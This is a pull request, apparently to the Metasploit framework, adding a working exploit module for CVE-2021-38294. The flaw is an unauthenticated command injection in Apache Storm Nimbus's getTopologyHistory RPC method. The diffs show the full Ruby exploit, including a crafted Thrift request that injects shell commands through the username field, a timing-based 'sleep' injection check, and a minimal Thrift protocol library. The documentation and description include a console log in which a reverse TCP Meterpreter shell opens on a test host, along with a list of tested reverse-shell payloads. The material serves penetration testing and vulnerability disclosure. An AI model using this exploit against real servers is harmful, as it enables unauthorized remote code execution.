### PR TITLE
Add Exploit For CVE-2021-38294 (Apache Storm Nimbus getTopologyHistory RCE)

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -351,7 +351,7 @@ GEM
       rex-core
       rex-struct2
       rex-text
-    rex-core (0.1.18)
+    rex-core (0.1.20)
     rex-encoder (0.1.6)
       metasm
       rex-arch

--- a/LICENSE_GEMS
+++ b/LICENSE_GEMS
@@ -127,7 +127,7 @@ regexp_parser, 2.1.1, MIT
 reline, 0.2.5, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
-rex-core, 0.1.18, "New BSD"
+rex-core, 0.1.20, "New BSD"
 rex-encoder, 0.1.6, "New BSD"
 rex-exploitation, 0.1.28, "New BSD"
 rex-java, 0.1.6, "New BSD"

--- a/documentation/modules/exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec.md
+++ b/documentation/modules/exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec.md
@@ -1,0 +1,76 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability within the Nimbus service component of Apache Storm.
+The getTopologyHistory RPC method method takes a single argument which is the name of a user which is
+concatenated into a string that is executed by bash. In order for the vulnerability to be exploitable, there
+must have been at least one topology submitted to the server. The topology may be active or inactive, but at
+least one must be present.
+
+This vulnerability was patched in versions 2.1.1, 2.2.1 and 1.2.4. This exploit was tested on version 2.2.0
+which is affected.
+
+## Verification Steps
+
+1. Setup a minimal Storm cluster using the published docker images. The following steps were adapted from [Docker
+  reference][1].
+  * The following steps can be executed to start up a minimal Storm cluster, but requires the [Storm Starter][2] jar
+    to exist in the current directory as `topology.jar`. Follow the steps on the [projects page][3] to build it with
+    Maven. Storm Starter v2.4.0 was used for testing.
+
+```
+# 1. Start a ZooKeeper server:
+docker run -d --rm --name some-zookeeper zookeeper
+# 2. Start a Nimbus server:
+docker run -p 6627:6627 -d --rm --name some-nimbus --link some-zookeeper:zookeeper \
+  storm:2.2.0 storm nimbus
+# 3. Start a Supervisor server:
+docker run -d --rm --name supervisor1 --link some-zookeeper:zookeeper --link some-nimbus:nimbus \
+  storm:2.2.0 storm supervisor
+# 4. Submit a topology using Storm Starter:
+docker run --rm --link some-nimbus:nimbus -it -v $(pwd)/topology.jar:/topology.jar \
+  storm:2.2.0 storm jar /topology.jar \
+  org.apache.storm.starter.ExclamationTopology exclamation
+```
+2. Start `msfconsole`
+3. Do: `exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec`
+4. Set the module options
+5. Do: `exploit`
+6. You should get a shell
+
+## Options
+
+## Scenarios
+
+### Debian 11.1 x64, Apache Storm v2.2.0 (From Docker)
+
+```
+msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > set TARGET  1
+TARGET => 1
+msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > set PAYLOAD  linux/x64/meterpreter/reverse_tcp 
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > check
+[*] 192.168.159.31:6627 - The target appears to be vulnerable. Successfully tested command injection.
+msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] 192.168.159.31:6627 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.159.31:6627 - The target appears to be vulnerable. Successfully tested command injection.
+[*] 192.168.159.31:6627 - Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Sending stage (3012548 bytes) to 192.168.159.31
+[*] 192.168.159.31:6627 - Command Stager progress - 100.00% done (823/823 bytes)
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.31:51680 ) at 2021-11-12 14:45:37 -0500
+
+meterpreter > getuid
+Server username: storm
+meterpreter > sysinfo
+Computer     : 172.17.0.3
+OS           : Debian 11.1 (Linux 5.4.0-89-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+[1]: https://hub.docker.com/_/storm
+[2]: https://github.com/apache/storm/tree/master/examples/storm-starter
+[3]: https://github.com/apache/storm/tree/master/examples/storm-starter#build-and-install-storm-jars-locally

--- a/documentation/modules/exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec.md
+++ b/documentation/modules/exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec.md
@@ -1,10 +1,11 @@
 ## Vulnerable Application
 
-This module exploits a command injection vulnerability within the Nimbus service component of Apache Storm.
-The getTopologyHistory RPC method method takes a single argument which is the name of a user which is
-concatenated into a string that is executed by bash. In order for the vulnerability to be exploitable, there
-must have been at least one topology submitted to the server. The topology may be active or inactive, but at
-least one must be present.
+This module exploits an unauthenticated command injection vulnerability within the Nimbus service
+component of Apache Storm. The `getTopologyHistory()` RPC method method takes a single argument
+which is the name of a user which is concatenated into a string that is executed by bash. In
+order for the vulnerability to be exploitable, there must have been at least one topology
+submitted to the server. The topology may be active or inactive, but at least one must be present.
+Successful exploitation results in remote code execution as the user running Apache Storm.
 
 This vulnerability was patched in versions 2.1.1, 2.2.1 and 1.2.4. This exploit was tested on version 2.2.0
 which is affected.
@@ -46,13 +47,13 @@ docker run --rm --link some-nimbus:nimbus -it -v $(pwd)/topology.jar:/topology.j
 ```
 msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > set TARGET  1
 TARGET => 1
-msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > set PAYLOAD  linux/x64/meterpreter/reverse_tcp 
+msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > set PAYLOAD  linux/x64/meterpreter/reverse_tcp
 PAYLOAD => linux/x64/meterpreter/reverse_tcp
 msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > check
 [*] 192.168.159.31:6627 - The target appears to be vulnerable. Successfully tested command injection.
 msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > exploit
 
-[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Started reverse TCP handler on 192.168.159.128:4444
 [*] 192.168.159.31:6627 - Running automatic check ("set AutoCheck false" to disable)
 [+] 192.168.159.31:6627 - The target appears to be vulnerable. Successfully tested command injection.
 [*] 192.168.159.31:6627 - Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp

--- a/lib/rex/proto/thrift.rb
+++ b/lib/rex/proto/thrift.rb
@@ -1,0 +1,54 @@
+# -*- coding: binary -*-
+
+module Rex::Proto::Thrift
+  class DataType < BinData::Uint8
+    T_STOP = 0
+    T_UTF7 = 11
+
+    default_parameter assert: -> { !DataType.name(value).nil? }
+
+    def self.name(value)
+      constants.select { |c| c.upcase == c }.find { |c| const_get(c) == value }
+    end
+
+    def to_sym
+      self.class.name(value)
+    end
+  end
+
+  class MessageType < BinData::Uint16be
+    CALL = 1
+    REPLY = 2
+
+    default_parameter assert: -> { !MessageType.name(value).nil? }
+
+    def self.name(value)
+      constants.select { |c| c.upcase == c }.find { |c| const_get(c) == value }
+    end
+
+    def to_sym
+      self.class.name(value)
+    end
+  end
+
+  class Header < BinData::Record
+    endian :big
+
+    uint16       :version, initial_value: 0x8001
+    message_type :message_type
+    uint32       :method_name_length, value: -> { method_name.length }
+    string       :method_name, read_length: :method_name_length
+    uint32       :sequence_id
+  end
+
+  class Data < BinData::Record
+    endian :big
+
+    data_type :data_type, initial_value: DataType::T_STOP
+    uint16    :field_id, onlyif: -> { data_type != DataType::T_STOP }
+    uint32    :data_length, onlyif: -> { data_type != DataType::T_STOP }, value: -> { data_value.length }
+    choice    :data_value, onlyif: -> { data_type != DataType::T_STOP }, selection: :data_type do
+      string DataType::T_UTF7
+    end
+  end
+end

--- a/modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb
+++ b/modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb
@@ -3,6 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'rex/stopwatch'
+
 class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
@@ -79,19 +81,10 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
-  def stopwatch
-    # https://blog.dnsimple.com/2018/03/elapsed-time-with-ruby-the-right-way/
-    start = Process.clock_gettime(Process::CLOCK_MONOTONIC)
-    ret = yield
-    elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - start
-
-    [ret, elapsed]
-  end
-
   def check
     sleep_time = rand(5..10)
 
-    injected, elapsed_time = stopwatch do
+    injected, elapsed_time = Rex::Stopwatch.elapsed_time do
       inject_cmd("sleep #{sleep_time}", timeout: sleep_time * 1.5)
     end
 

--- a/modules/exploits/linux/misc/nimbus_gettopology_cmd_exec.rb
+++ b/modules/exploits/linux/misc/nimbus_gettopology_cmd_exec.rb
@@ -1,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  # prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => '',
+        'Description' => %q{
+          This module exploits a command injection vulnerability within the Nimbus service's getTopologyHistory RPC
+          method. The method takes a single argument which is the name of a user which is concatenated into a string
+          that is executed by bash. In order for the vulnerability to be exploitable, there must have been at least one
+          topology submitted to the server. The topology may be active or inactive, but at least one must be present.
+        },
+        'Author' => [
+          'Alvaro Muñoz', # discovery and original research
+          'Spencer McIntyre', # metasploit module
+        ],
+        'References' => [
+          ['CVE', '2021-38294'],
+          ['URL', 'https://securitylab.github.com/advisories/GHSL-2021-085-apache-storm/']
+        ],
+        'DisclosureDate' => '2021-10-28',
+        'License' => MSF_LICENSE,
+        'Platform' => ['linux', 'unix'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'RPORT' => 6627,
+          'MeterpreterTryToFork' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def check
+    http_res = send_command('id')
+    return CheckCode::Unknown if http_res.nil?
+    return CheckCode::Safe unless http_res.code == 200
+
+    cmd_res = parse_response(http_res)
+    return CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\d+)\(\S+\) /
+
+    return CheckCode::Vulnerable("Command executed as uid #{Regexp.last_match(1)}.")
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    lock_file = "/tmp/#{Rex::Text.rand_text_alphanumeric(12)}"
+
+    # if there are multiple topologies, the command will be executed more than once, so use a lock file to prevent that
+    cmd = "if [ ! -f #{lock_file} ]; then touch #{lock_file}; #{cmd}; fi"
+    sock = connect
+    vprint_status("Running: #{cmd}")
+
+    request = [
+      Thrift::Header.new(message_type: Thrift::MessageType::CALL, method_name: 'getTopologyHistory'),
+      Thrift::Data.new(data_type: Thrift::DataType::T_UTF7, field_id: 1, data_value: ";#{cmd}"),
+      Thrift::Data.new(data_type: Thrift::DataType::T_STOP)
+    ].map(&:to_binary_s).join
+
+    sock.put([ request.length ].pack('N') + request)
+    disconnect
+  end
+
+  module Thrift
+    class DataType
+      T_STOP = 0
+      T_UTF7 = 11
+    end
+
+    class MessageType
+      CALL = 1
+      REPLY = 2
+    end
+
+    class Header < BinData::Record
+      endian :big
+
+      uint16 :version, initial_value: 0x8001
+      uint16 :message_type
+      uint32 :method_name_length, value: -> { method_name.length }
+      string :method_name, read_length: :method_name_length
+      uint32 :sequence_id
+    end
+
+    class Data < BinData::Record
+      endian :big
+
+      uint8  :data_type
+      uint16 :field_id, onlyif: -> { data_type != DataType::T_STOP }
+      uint32 :data_length, onlyif: -> { data_type != DataType::T_STOP }, value: -> { data_value.length }
+      choice :data_value, onlyif: -> { data_type != DataType::T_STOP }, selection: :data_type do
+        string DataType::T_UTF7
+      end
+    end
+  end
+end

--- a/modules/exploits/linux/misc/nimbus_gettopology_cmd_exec.rb
+++ b/modules/exploits/linux/misc/nimbus_gettopology_cmd_exec.rb
@@ -4,11 +4,9 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-
   Rank = ExcellentRanking
 
-  # TODO: readd this once the check method is written
-  # prepend Msf::Exploit::Remote::AutoCheck
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::CmdStager
 
@@ -68,16 +66,36 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  def stopwatch
+    # https://blog.dnsimple.com/2018/03/elapsed-time-with-ruby-the-right-way/
+    start = Process.clock_gettime(Process::CLOCK_MONOTONIC)
+    ret = yield
+    elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - start
+
+    [ret, elapsed]
+  end
+
   def check
-    # write this check method, maybe using a timed fingerprint given the blind nature
-    http_res = send_command('id')
-    return CheckCode::Unknown if http_res.nil?
-    return CheckCode::Safe unless http_res.code == 200
+    begin
+      connect
+    rescue Rex::ConnectionError
+      return CheckCode::Unknown('Failed to connect to the service.')
+    end
 
-    cmd_res = parse_response(http_res)
-    return CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\d+)\(\S+\) /
+    sleep_time = rand(5..10)
+    response, elapsed_time = stopwatch do
+      execute_command("sleep #{sleep_time}", { disconnect: false })
+      recv_response(sleep_time + 5)
+    end
+    disconnect
 
-    return CheckCode::Vulnerable("Command executed as uid #{Regexp.last_match(1)}.")
+    vprint_status("Elapsed time: #{elapsed_time} seconds")
+
+    unless response && elapsed_time > sleep_time
+      return CheckCode::Safe('Failed to test command injection.')
+    end
+
+    CheckCode::Appears('Successfully tested command injection.')
   end
 
   def exploit
@@ -91,20 +109,42 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def execute_command(cmd, _opts = {})
+  def execute_command(cmd, opts = {})
     # comment out the rest of the command to ensure it's only executed once and prefix a random tag to avoid caching
-    cmd = "#{cmd} # #{Rex::Text.rand_text_alphanumeric(4..8)}"
-    sock = connect
+    cmd = "#{cmd} ##{Rex::Text.rand_text_alphanumeric(4..8)}"
     vprint_status("Executing command: #{cmd}")
 
-    request = [
+    send_request([
       Thrift::Header.new(message_type: Thrift::MessageType::CALL, method_name: 'getTopologyHistory'),
       Thrift::Data.new(data_type: Thrift::DataType::T_UTF7, field_id: 1, data_value: ";#{cmd}"),
       Thrift::Data.new
-    ].map(&:to_binary_s).join
+    ].map(&:to_binary_s).join)
+    disconnect if opts.fetch(:disconnect, true)
+  end
 
+  def send_request(request)
+    connect if sock.nil?
     sock.put([ request.length ].pack('N') + request)
-    disconnect
+  end
+
+  def recv_response(timeout)
+    remaining = timeout
+    res_size, elapsed = stopwatch do
+      sock.timed_read(4, remaining)
+    end
+
+    remaining -= elapsed
+    return nil if res_size.nil? || res_size.length != 4 || remaining <= 0
+
+    res, = stopwatch do
+      sock.timed_read(res_size.unpack1('N'), remaining)
+    end
+
+    return nil if res.nil? || res.length != res_size.unpack1('N')
+
+    return res_size + res
+  rescue Timeout::Error
+    return nil
   end
 
   module Thrift

--- a/modules/exploits/linux/misc/nimbus_gettopology_cmd_exec.rb
+++ b/modules/exploits/linux/misc/nimbus_gettopology_cmd_exec.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
 
+  # TODO: readd this once the check method is written
   # prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::CmdStager
@@ -68,6 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    # write this check method, maybe using a timed fingerprint given the blind nature
     http_res = send_command('id')
     return CheckCode::Unknown if http_res.nil?
     return CheckCode::Safe unless http_res.code == 200
@@ -90,17 +92,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    lock_file = "/tmp/#{Rex::Text.rand_text_alphanumeric(12)}"
-
-    # if there are multiple topologies, the command will be executed more than once, so use a lock file to prevent that
-    cmd = "if [ ! -f #{lock_file} ]; then touch #{lock_file}; #{cmd}; fi"
+    # comment out the rest of the command to ensure it's only executed once and prefix a random tag to avoid caching
+    cmd = "#{cmd} # #{Rex::Text.rand_text_alphanumeric(4..8)}"
     sock = connect
-    vprint_status("Running: #{cmd}")
+    vprint_status("Executing command: #{cmd}")
 
     request = [
       Thrift::Header.new(message_type: Thrift::MessageType::CALL, method_name: 'getTopologyHistory'),
       Thrift::Data.new(data_type: Thrift::DataType::T_UTF7, field_id: 1, data_value: ";#{cmd}"),
-      Thrift::Data.new(data_type: Thrift::DataType::T_STOP)
+      Thrift::Data.new
     ].map(&:to_binary_s).join
 
     sock.put([ request.length ].pack('N') + request)
@@ -108,33 +108,53 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   module Thrift
-    class DataType
+    class DataType < BinData::Uint8
       T_STOP = 0
       T_UTF7 = 11
+
+      default_parameter assert: -> { !DataType.name(value).nil? }
+
+      def self.name(value)
+        constants.select { |c| c.upcase == c }.find { |c| const_get(c) == value }
+      end
+
+      def to_sym
+        self.class.name(value)
+      end
     end
 
-    class MessageType
+    class MessageType < BinData::Uint16be
       CALL = 1
       REPLY = 2
+
+      default_parameter assert: -> { !MessageType.name(value).nil? }
+
+      def self.name(value)
+        constants.select { |c| c.upcase == c }.find { |c| const_get(c) == value }
+      end
+
+      def to_sym
+        self.class.name(value)
+      end
     end
 
     class Header < BinData::Record
       endian :big
 
-      uint16 :version, initial_value: 0x8001
-      uint16 :message_type
-      uint32 :method_name_length, value: -> { method_name.length }
-      string :method_name, read_length: :method_name_length
-      uint32 :sequence_id
+      uint16       :version, initial_value: 0x8001
+      message_type :message_type
+      uint32       :method_name_length, value: -> { method_name.length }
+      string       :method_name, read_length: :method_name_length
+      uint32       :sequence_id
     end
 
     class Data < BinData::Record
       endian :big
 
-      uint8  :data_type
-      uint16 :field_id, onlyif: -> { data_type != DataType::T_STOP }
-      uint32 :data_length, onlyif: -> { data_type != DataType::T_STOP }, value: -> { data_value.length }
-      choice :data_value, onlyif: -> { data_type != DataType::T_STOP }, selection: :data_type do
+      data_type :data_type, initial_value: DataType::T_STOP
+      uint16    :field_id, onlyif: -> { data_type != DataType::T_STOP }
+      uint32    :data_length, onlyif: -> { data_type != DataType::T_STOP }, value: -> { data_value.length }
+      choice    :data_value, onlyif: -> { data_type != DataType::T_STOP }, selection: :data_type do
         string DataType::T_UTF7
       end
     end

--- a/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
+++ b/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
@@ -19,13 +19,13 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Apache Storm Nimbus getTopologyHistory Command Execution',
+        'Name' => 'Apache Storm Nimbus getTopologyHistory Unauthenticated Command Execution',
         'Description' => %q{
-          This module exploits a command injection vulnerability within the Nimbus service component of Apache Storm.
+          This module exploits an unauthenticated command injection vulnerability within the Nimbus service component of Apache Storm.
           The getTopologyHistory RPC method method takes a single argument which is the name of a user which is
           concatenated into a string that is executed by bash. In order for the vulnerability to be exploitable, there
           must have been at least one topology submitted to the server. The topology may be active or inactive, but at
-          least one must be present.
+          least one must be present. Successful exploitation results in remote code execution as the user running Apache Storm.
 
           This vulnerability was patched in versions 2.1.1, 2.2.1 and 1.2.4. This exploit was tested on version 2.2.0
           which is affected.

--- a/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
+++ b/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
@@ -38,11 +38,11 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2021-38294'],
           ['URL', 'https://securitylab.github.com/advisories/GHSL-2021-085-apache-storm/']
         ],
-        'DisclosureDate' => '2021-10-28',
+        'DisclosureDate' => '2021-10-25',
         'License' => MSF_LICENSE,
         'Platform' => ['linux', 'unix'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
-        'Privileged' => true,
+        'Privileged' => false,
         'Targets' => [
           [
             'Unix Command',
@@ -136,9 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
     remaining -= elapsed
     return nil if res_size.nil? || res_size.length != 4 || remaining <= 0
 
-    res, = Rex::Stopwatch.elapsed_time do
-      sock.timed_read(res_size.unpack1('N'), remaining)
-    end
+    res = sock.timed_read(res_size.unpack1('N'), remaining)
 
     return nil if res.nil? || res.length != res_size.unpack1('N')
 

--- a/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
+++ b/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
@@ -3,6 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'rex/proto/thrift'
+
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -10,16 +12,22 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::CmdStager
 
+  Thrift = Rex::Proto::Thrift
+
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => '',
+        'Name' => 'Apache Storm Nimbus getTopologyHistory Command Execution',
         'Description' => %q{
-          This module exploits a command injection vulnerability within the Nimbus service's getTopologyHistory RPC
-          method. The method takes a single argument which is the name of a user which is concatenated into a string
-          that is executed by bash. In order for the vulnerability to be exploitable, there must have been at least one
-          topology submitted to the server. The topology may be active or inactive, but at least one must be present.
+          This module exploits a command injection vulnerability within the Nimbus service component of Apache Storm.
+          The getTopologyHistory RPC method method takes a single argument which is the name of a user which is
+          concatenated into a string that is executed by bash. In order for the vulnerability to be exploitable, there
+          must have been at least one topology submitted to the server. The topology may be active or inactive, but at
+          least one must be present.
+
+          This vulnerability was patched in versions 2.1.1, 2.2.1 and 1.2.4. This exploit was tested on version 2.2.0
+          which is affected.
         },
         'Author' => [
           'Alvaro Muñoz', # discovery and original research
@@ -145,58 +153,5 @@ class MetasploitModule < Msf::Exploit::Remote
     return res_size + res
   rescue Timeout::Error
     return nil
-  end
-
-  module Thrift
-    class DataType < BinData::Uint8
-      T_STOP = 0
-      T_UTF7 = 11
-
-      default_parameter assert: -> { !DataType.name(value).nil? }
-
-      def self.name(value)
-        constants.select { |c| c.upcase == c }.find { |c| const_get(c) == value }
-      end
-
-      def to_sym
-        self.class.name(value)
-      end
-    end
-
-    class MessageType < BinData::Uint16be
-      CALL = 1
-      REPLY = 2
-
-      default_parameter assert: -> { !MessageType.name(value).nil? }
-
-      def self.name(value)
-        constants.select { |c| c.upcase == c }.find { |c| const_get(c) == value }
-      end
-
-      def to_sym
-        self.class.name(value)
-      end
-    end
-
-    class Header < BinData::Record
-      endian :big
-
-      uint16       :version, initial_value: 0x8001
-      message_type :message_type
-      uint32       :method_name_length, value: -> { method_name.length }
-      string       :method_name, read_length: :method_name_length
-      uint32       :sequence_id
-    end
-
-    class Data < BinData::Record
-      endian :big
-
-      data_type :data_type, initial_value: DataType::T_STOP
-      uint16    :field_id, onlyif: -> { data_type != DataType::T_STOP }
-      uint32    :data_length, onlyif: -> { data_type != DataType::T_STOP }, value: -> { data_value.length }
-      choice    :data_value, onlyif: -> { data_type != DataType::T_STOP }, selection: :data_type do
-        string DataType::T_UTF7
-      end
-    end
   end
 end

--- a/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
+++ b/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'rex/proto/thrift'
+require 'rex/stopwatch'
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -74,15 +75,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def stopwatch
-    # https://blog.dnsimple.com/2018/03/elapsed-time-with-ruby-the-right-way/
-    start = Process.clock_gettime(Process::CLOCK_MONOTONIC)
-    ret = yield
-    elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - start
-
-    [ret, elapsed]
-  end
-
   def check
     begin
       connect
@@ -91,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     sleep_time = rand(5..10)
-    response, elapsed_time = stopwatch do
+    response, elapsed_time = Rex::Stopwatch.elapsed_time do
       execute_command("sleep #{sleep_time}", { disconnect: false })
       recv_response(sleep_time + 5)
     end
@@ -137,14 +129,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def recv_response(timeout)
     remaining = timeout
-    res_size, elapsed = stopwatch do
+    res_size, elapsed = Rex::Stopwatch.elapsed_time do
       sock.timed_read(4, remaining)
     end
 
     remaining -= elapsed
     return nil if res_size.nil? || res_size.length != 4 || remaining <= 0
 
-    res, = stopwatch do
+    res, = Rex::Stopwatch.elapsed_time do
       sock.timed_read(res_size.unpack1('N'), remaining)
     end
 


### PR DESCRIPTION
This adds an exploit for CVE-2021-38294 which is an unauthenticated remote command execution vulnerability within the `getTopologyHistory` RPC method that is provided by the Nimbus service which is a component of the Apache Storm project. **In order to be exploitable, at least one topology must have been submitted to the Storm cluster. It may be active or inactive but one must be present.** The steps detailed in the module docs include submitting a topology for testing purposes. Successful exploitation results in OS command execution as the user that started the Nimbus service.

This also includes a very minimal implementation of the [apache/thrift](https://github.com/apache/thrift) protocol which is what Nimbus runs on. Nimbus uses a "buffered" variant that is basically all of the Thrift frames prefixed with a uint32 integer representing the size of all of the thrift data.

~~This requires rapid7/rex-core#18 to be landed first to provide the `stopwatch` method used for timing operations.~~ Done.

## Verification

List the steps needed to make sure this thing works

- [x] Setup a vulnerable Storm cluster (detailed steps and copy-pastable instructions are in the module docs, a Apache Storm Starter jar file is required though).
- [x] Start `msfconsole`
- [x] Do: `exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec`
- [x] Set the module options
- [x] Do: `exploit`
- [x] You should get a shell

The following payloads were successfully tested in the example docker environment:
* linux/x64/meterpreter/reverse_tcp
* cmd/unix/reverse_python
  * For some reason, the session opened message is not displayed, but the session works as expected
* cmd/unix/generic
* cmd/unix/reverse_openssl

## Example

```
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > set TARGET  1
TARGET => 1
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > set PAYLOAD  linux/x64/meterpreter/reverse_tcp 
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > check
[*] 192.168.159.31:6627 - The target appears to be vulnerable. Successfully tested command injection.
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.31:6627 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.159.31:6627 - The target appears to be vulnerable. Successfully tested command injection.
[*] 192.168.159.31:6627 - Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3012548 bytes) to 192.168.159.31
[*] 192.168.159.31:6627 - Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.31:51680 ) at 2021-11-12 14:45:37 -0500
meterpreter > getuid
Server username: storm
meterpreter > sysinfo
Computer     : 172.17.0.3
OS           : Debian 11.1 (Linux 5.4.0-89-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```